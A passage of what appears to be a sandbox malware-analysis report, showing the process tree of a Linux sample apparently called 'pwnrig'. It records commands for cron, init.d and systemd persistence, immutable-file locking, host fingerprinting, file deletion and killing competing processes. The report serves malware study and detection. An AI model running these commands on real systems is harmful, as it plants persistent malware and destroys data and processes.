                                                                                                                                          • Writes file to system bin folder
                                                                                                                                          PID:2685
                                                                                                                                        • /bin/tee
                                                                                                                                          tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
                                                                                                                                          4⤵
                                                                                                                                          • Creates/modifies Cron job
                                                                                                                                          PID:2687
                                                                                                                                        • /bin/sed
                                                                                                                                          sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
                                                                                                                                          4⤵
                                                                                                                                          • Attempts to change immutable files
                                                                                                                                          • Creates/modifies Cron job
                                                                                                                                          PID:2688
                                                                                                                                        • /bin/chmod
                                                                                                                                          chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
                                                                                                                                          4⤵
                                                                                                                                            PID:2689
                                                                                                                                          • /bin/chattr
                                                                                                                                            chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
                                                                                                                                            4⤵
                                                                                                                                            • Attempts to change immutable files
                                                                                                                                            PID:2690
                                                                                                                                          • /bin/which
                                                                                                                                            which chkconfig
                                                                                                                                            4⤵
                                                                                                                                              PID:2691
                                                                                                                                            • /bin/which
                                                                                                                                              which update-rc.d
                                                                                                                                              4⤵
                                                                                                                                                PID:2692
                                                                                                                                              • /bin/chattr
                                                                                                                                                chattr -i -a /etc/init.d/pwnrig /bin/initdr
                                                                                                                                                4⤵
                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                PID:2693
                                                                                                                                              • /sbin/update-rc.d
                                                                                                                                                update-rc.d -f pwnrig disable
                                                                                                                                                4⤵
                                                                                                                                                  PID:2694
                                                                                                                                                • /sbin/update-rc.d
                                                                                                                                                  update-rc.d -f pwnrig remove
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2695
                                                                                                                                                    • /bin/systemctl
                                                                                                                                                      systemctl daemon-reload
                                                                                                                                                      5⤵
                                                                                                                                                        PID:2696
                                                                                                                                                    • /bin/rm
                                                                                                                                                      rm -rf /bin/initdr
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2820
                                                                                                                                                      • /bin/cp
                                                                                                                                                        cp -f -r -- /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f /bin/initdr
                                                                                                                                                        4⤵
                                                                                                                                                        • Writes file to system bin folder
                                                                                                                                                        PID:2821
                                                                                                                                                      • /bin/tee
                                                                                                                                                        tee /etc/init.d/pwnrig
                                                                                                                                                        4⤵
                                                                                                                                                        • Modifies init.d
                                                                                                                                                        PID:2823
                                                                                                                                                      • /bin/sed
                                                                                                                                                        sed -i "1 s/-e //" /etc/init.d/pwnrig
                                                                                                                                                        4⤵
                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                        • Modifies init.d
                                                                                                                                                        PID:2824
                                                                                                                                                      • /bin/chmod
                                                                                                                                                        chmod +x /etc/init.d/pwnrig /bin/initdr
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2825
                                                                                                                                                        • /sbin/update-rc.d
                                                                                                                                                          update-rc.d pwnrig defaults
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2826
                                                                                                                                                            • /bin/systemctl
                                                                                                                                                              systemctl daemon-reload
                                                                                                                                                              5⤵
                                                                                                                                                                PID:2827
                                                                                                                                                            • /sbin/update-rc.d
                                                                                                                                                              update-rc.d pwnrig enable
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2952
                                                                                                                                                                • /bin/systemctl
                                                                                                                                                                  systemctl "--root=/" --quiet enable pwnrig
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2953
                                                                                                                                                                  • /bin/systemctl
                                                                                                                                                                    systemctl daemon-reload
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:2954
                                                                                                                                                                  • /bin/chattr
                                                                                                                                                                    chattr +i +a /etc/init.d/pwnrig /bin/initdr
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                    PID:3079
                                                                                                                                                                  • /bin/which
                                                                                                                                                                    which systemctl
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3080
                                                                                                                                                                    • /bin/chattr
                                                                                                                                                                      chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                      PID:3081
                                                                                                                                                                    • /bin/rm
                                                                                                                                                                      rm -rf /bin/sysdr
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3082
                                                                                                                                                                      • /bin/cp
                                                                                                                                                                        cp -f -r -- /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f /bin/sysdr
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Writes file to system bin folder
                                                                                                                                                                        PID:3083
                                                                                                                                                                      • /bin/tee
                                                                                                                                                                        tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Modifies systemd
                                                                                                                                                                        PID:3085
                                                                                                                                                                      • /bin/sed
                                                                                                                                                                        sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                        PID:3086
                                                                                                                                                                      • /bin/chattr
                                                                                                                                                                        chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                        PID:3087
                                                                                                                                                                      • /bin/systemctl
                                                                                                                                                                        systemctl enable pwnrige.service
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:3088
                                                                                                                                                                        • /bin/systemctl
                                                                                                                                                                          systemctl enable pwnrigl.service
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3213
                                                                                                                                                                          • /bin/systemctl
                                                                                                                                                                            systemctl daemon-reload
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:3338
                                                                                                                                                                            • /bin/systemctl
                                                                                                                                                                              systemctl reload-or-restart pwnrige.service
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:3463
                                                                                                                                                                          • /tmp/-python37-59bcbe28-2a35-4e11-824b-88ffcec00448
                                                                                                                                                                            /tmp/-python37-59bcbe28-2a35-4e11-824b-88ffcec00448
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Writes file to tmp directory
                                                                                                                                                                            PID:3518
                                                                                                                                                                          • /bin/chattr
                                                                                                                                                                            chattr -ia /var/spool/cron/atjobs
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                            PID:3847
                                                                                                                                                                          • /bin/chattr
                                                                                                                                                                            chattr -ia /var/spool/cron/crontabs
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                            PID:3848
                                                                                                                                                                          • /bin/chattr
                                                                                                                                                                            chattr -ia /var/spool/cron/atjobs
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                            PID:3849
                                                                                                                                                                          • /bin/chattr
                                                                                                                                                                            chattr -ia /var/spool/cron/crontabs
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                            PID:3850
                                                                                                                                                                          • /bin/bash
                                                                                                                                                                            bash -c "find /usr -type f -regextype egrep -regex '.*[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}' -exec rm -rf {} +"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3851
                                                                                                                                                                            • /bin/find
                                                                                                                                                                              find /usr -type f -regextype egrep -regex ".*[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}" -exec rm -rf "{}" +
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3851
                                                                                                                                                                                • /bin/rm
                                                                                                                                                                                  rm -rf /usr/local/share/28bce82f-4b8d-44b3-90c2-8ab3dafd7336
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3852
                                                                                                                                                                                • /bin/bash
                                                                                                                                                                                  bash -c "echo \"*/2 * * * * nohup /usr/69c334af-26ef-4ef9-8aef-5d0fcf09fabe >/dev/null 2>&1 &\" | crontab -"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3853
                                                                                                                                                                                    • /bin/crontab
                                                                                                                                                                                      crontab -
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Creates/modifies Cron job
                                                                                                                                                                                      PID:3855
                                                                                                                                                                                  • /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
                                                                                                                                                                                    /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks hardware identifiers (DMI)
                                                                                                                                                                                    • Reads hardware information
                                                                                                                                                                                    • Checks CPU configuration
                                                                                                                                                                                    • Reads CPU attributes
                                                                                                                                                                                    • Enumerates kernel/hardware configuration
                                                                                                                                                                                    • Writes file to tmp directory
                                                                                                                                                                                    PID:3859
                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                      sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                      PID:3860
                                                                                                                                                                                      • /bin/hostname
                                                                                                                                                                                        hostname -I
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                                        PID:3863
                                                                                                                                                                                      • /bin/awk
                                                                                                                                                                                        awk "{print \$1}"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:3865
                                                                                                                                                                                        • /bin/cat
                                                                                                                                                                                          cat /etc/ssh/sshd_config
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:3867
                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                            grep "Port "
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:3868
                                                                                                                                                                                            • /bin/head
                                                                                                                                                                                              head -n 1
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:3869
                                                                                                                                                                                              • /bin/awk
                                                                                                                                                                                                awk "{print \"-\"\$2}"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:3870
                                                                                                                                                                                                • /bin/whoami
                                                                                                                                                                                                  whoami
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:3871
                                                                                                                                                                                                  • /bin/hostname
                                                                                                                                                                                                    hostname
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:3872
                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                      grep -c "^processor" /proc/cpuinfo
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Checks CPU configuration
                                                                                                                                                                                                      PID:3873
                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                      grep -m 1 "model name" /proc/cpuinfo
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Checks CPU configuration
                                                                                                                                                                                                      PID:3876
                                                                                                                                                                                                    • /bin/cut
                                                                                                                                                                                                      cut -d: -f2
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:3877
                                                                                                                                                                                                      • /bin/sed
                                                                                                                                                                                                        sed -e "s/^ *//"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:3878
                                                                                                                                                                                                        • /bin/sed
                                                                                                                                                                                                          sed -e "s/\$//"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:3879
                                                                                                                                                                                                          • /bin/awk
                                                                                                                                                                                                            awk "{print \$1}"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:3882
                                                                                                                                                                                                            • /bin/awk
                                                                                                                                                                                                              awk "{print \$4}"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:3885
                                                                                                                                                                                                              • /bin/awk
                                                                                                                                                                                                                awk "{print \$4}"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:3888
                                                                                                                                                                                                                • /bin/awk
                                                                                                                                                                                                                  awk "{print \$3}"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:3891
                                                                                                                                                                                                                  • /bin/awk
                                                                                                                                                                                                                    awk "{print \$4}"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:3894
                                                                                                                                                                                                                    • /bin/awk
                                                                                                                                                                                                                      awk "{print \$1}"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:3897
                                                                                                                                                                                                                      • /bin/awk
                                                                                                                                                                                                                        awk "{print \$2\" \"\$3\" \"\$4}"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:3899
                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                        sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:3900
                                                                                                                                                                                                                          • /bin/ps
                                                                                                                                                                                                                            ps -A "-ostat,ppid"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                            PID:3901
                                                                                                                                                                                                                          • /bin/awk
                                                                                                                                                                                                                            awk "/[zZ]/ && !a[\$2]++ {print \$2}"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:3902
                                                                                                                                                                                                                            • /bin/id
                                                                                                                                                                                                                              id -u
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:3904
                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                grep /etc/cron
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:3906
                                                                                                                                                                                                                                • /bin/ps
                                                                                                                                                                                                                                  ps x
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                  PID:3905
                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                  grep -v grep
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:3907
                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:3909
                                                                                                                                                                                                                                    • /bin/id
                                                                                                                                                                                                                                      id -u
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:3910
                                                                                                                                                                                                                                      • /bin/ps
                                                                                                                                                                                                                                        ps aux
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Checks CPU configuration
                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                        • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                        PID:3911
                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                        grep -v grep
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:3912
                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                          grep -v -- "-bash[[:space:]]*\$"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:3913
                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                            grep -v /usr/sbin/httpd
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:3914
                                                                                                                                                                                                                                            • /bin/awk
                                                                                                                                                                                                                                              awk "{if(\$3>30.0) print \$2}"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:3915
                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                              sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:3917
                                                                                                                                                                                                                                                • /bin/id
                                                                                                                                                                                                                                                  id -u
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:3918
                                                                                                                                                                                                                                                  • /bin/ps
                                                                                                                                                                                                                                                    ps aux
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Checks CPU configuration
                                                                                                                                                                                                                                                    • Reads CPU attributes
                                                                                                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                                                                                                    PID:3920
                                                                                                                                                                                                                                                  • /bin/grep
                                                                                                                                                                                                                                                    grep -v grep
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:3921
                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                      grep -- "-bash[[:space:]]*\$"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:3922
                                                                                                                                                                                                                                                      • /bin/awk
                                                                                                                                                                                                                                                        awk "{if(\$3>30.0) print \$2}"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:3923
                                                                                                                                                                                                                                                        • /bin/wc
                                                                                                                                                                                                                                                          wc -l
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:3924
                                                                                                                                                                                                                                                      • /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
                                                                                                                                                                                                                                                        /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Checks hardware identifiers (DMI)
                                                                                                                                                                                                                                                        • Reads hardware information
                                                                                                                                                                                                                                                        • Checks CPU configuration
                                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                                        • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                        PID:3925
                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                          sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                          PID:3926
                                                                                                                                                                                                                                                          • /bin/hostname
                                                                                                                                                                                                                                                            hostname -I
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                            PID:3929
                                                                                                                                                                                                                                                          • /bin/awk
                                                                                                                                                                                                                                                            awk "{print \$1}"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:3931
                                                                                                                                                                                                                                                            • /bin/cat
                                                                                                                                                                                                                                                              cat /etc/ssh/sshd_config
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:3933
                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                grep "Port "
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:3934
                                                                                                                                                                                                                                                                • /bin/head
                                                                                                                                                                                                                                                                  head -n 1
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:3935
                                                                                                                                                                                                                                                                  • /bin/awk
                                                                                                                                                                                                                                                                    awk "{print \"-\"\$2}"
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:3936
                                                                                                                                                                                                                                                                    • /bin/whoami
                                                                                                                                                                                                                                                                      whoami
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:3937
                                                                                                                                                                                                                                                                      • /bin/hostname
                                                                                                                                                                                                                                                                        hostname
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:3938
                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                          grep -c "^processor" /proc/cpuinfo
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Checks CPU configuration
                                                                                                                                                                                                                                                                          PID:3939
                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                          grep -m 1 "model name" /proc/cpuinfo
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Checks CPU configuration
                                                                                                                                                                                                                                                                          PID:3942
                                                                                                                                                                                                                                                                        • /bin/cut
                                                                                                                                                                                                                                                                          cut -d: -f2
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:3943
                                                                                                                                                                                                                                                                          • /bin/sed
                                                                                                                                                                                                                                                                            sed -e "s/^ *//"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:3944
                                                                                                                                                                                                                                                                            • /bin/sed
                                                                                                                                                                                                                                                                              sed -e "s/\$//"
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:3945
                                                                                                                                                                                                                                                                              • /bin/awk
                                                                                                                                                                                                                                                                                awk "{print \$1}"
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:3948
                                                                                                                                                                                                                                                                                • /bin/awk
                                                                                                                                                                                                                                                                                  awk "{print \$4}"
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:3951
                                                                                                                                                                                                                                                                                  • /bin/awk
                                                                                                                                                                                                                                                                                    awk "{print \$4}"
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:3954
                                                                                                                                                                                                                                                                                    • /bin/awk
                                                                                                                                                                                                                                                                                      awk "{print \$3}"
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:3957
                                                                                                                                                                                                                                                                                      • /bin/awk
                                                                                                                                                                                                                                                                                        awk "{print \$4}"
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:3960
                                                                                                                                                                                                                                                                                        • /bin/awk
                                                                                                                                                                                                                                                                                          awk "{print \$1}"
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:3963
                                                                                                                                                                                                                                                                                          • /bin/awk
                                                                                                                                                                                                                                                                                            awk "{print \$2\" \"\$3\" \"\$4}"
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:3965
                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                            sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:3966
                                                                                                                                                                                                                                                                                              • /bin/ps
                                                                                                                                                                                                                                                                                                ps -A "-ostat,ppid"
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                                                                                                                PID:3967
                                                                                                                                                                                                                                                                                              • /bin/awk
                                                                                                                                                                                                                                                                                                awk "/[zZ]/ && !a[\$2]++ {print \$2}"
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:3968
                                                                                                                                                                                                                                                                                                • /bin/id
                                                                                                                                                                                                                                                                                                  id -u
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:3970
                                                                                                                                                                                                                                                                                                  • /bin/ps
                                                                                                                                                                                                                                                                                                    ps x
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Reads CPU attributes
                                                                                                                                                                                                                                                                                                    • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                                                                                                                                                    PID:3971
                                                                                                                                                                                                                                                                                                  • /bin/grep
                                                                                                                                                                                                                                                                                                    grep /etc/cron
